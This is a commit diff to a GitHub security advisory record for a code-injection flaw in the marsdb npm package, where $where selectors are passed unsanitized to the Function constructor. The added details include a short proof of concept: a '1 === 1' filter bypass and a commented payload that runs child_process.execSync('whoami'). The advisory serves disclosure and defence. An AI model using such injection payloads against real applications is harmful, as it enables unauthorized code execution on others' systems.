Skip to content

Commit 274ff7b

Browse files
committed
1 parent daa0d48 commit 274ff7b

1 file changed

Lines changed: 19 additions & 6 deletions

File tree

advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json

Lines changed: 19 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -1,12 +1,17 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-5mrr-rgp6-x4gr",
4-
"modified": "2020-08-31T18:48:01Z",
4+
"modified": "2023-01-09T05:03:48Z",
55
"published": "2020-09-03T19:39:05Z",
66
"aliases": [],
7-
"summary": "Command Injection in marsdb",
8-
"details": "All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
9-
"severity": [],
7+
"summary": "[Security] Arbitrary Code Execution via unsanitized $where selector (GHSA-5mrr-rgp6-x4gr)",
8+
"details": "The $where query selector in marsdb passes user-supplied strings directly \nto the Function() constructor without any sanitization or validation.\n\nVulnerable code in dist/DocumentMatcher.js, line 419:\n selectorValue = Function('obj', 'return ' + selectorValue);\n\nThis allows arbitrary JavaScript execution in the application context.\nOn Node.js <= 18 (typical production environments), this escalates to \nfull Remote Code Execution via require('child_process').\n\n## Proof of Concept\n\n```js\nconst Collection = require('marsdb').default;\nconst col = new Collection('users');\ncol.insert({ name: 'alice' });\n\n// Authentication bypass\ncol.find({ $where: \"1 === 1\" }).then(result => {\n console.log('Filter bypassed:', result);\n});\n\n// Full RCE on Node.js <= 18:\n// col.find({\n// $where: \"require('child_process').execSync('whoami').toString()\"\n// });\n```\n\nDiscovered using vulnscope - AI-assisted OSS vulnerability scanner\nhttps://github.com/msh0625/vulnscope",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
13+
}
14+
],
1015
"affected": [
1116
{
1217
"package": {
@@ -18,7 +23,10 @@
1823
"type": "ECOSYSTEM",
1924
"events": [
2025
{
21-
"introduced": "0.0.0"
26+
"introduced": "0"
27+
},
28+
{
29+
"last_affected": "0.6.10"
2230
}
2331
]
2432
}
@@ -30,14 +38,19 @@
3038
"type": "WEB",
3139
"url": "https://github.com/bkimminich/juice-shop/issues/1173"
3240
},
41+
{
42+
"type": "PACKAGE",
43+
"url": "https://github.com/c58/marsdb/blob/master/dist/DocumentMatcher.js"
44+
},
3345
{
3446
"type": "WEB",
3547
"url": "https://www.npmjs.com/advisories/1122"
3648
}
3749
],
3850
"database_specific": {
3951
"cwe_ids": [
40-
"CWE-77"
52+
"CWE-77",
53+
"CWE-94"
4154
],
4255
"severity": "CRITICAL",
4356
"github_reviewed": true,

0 commit comments

Comments
 (0)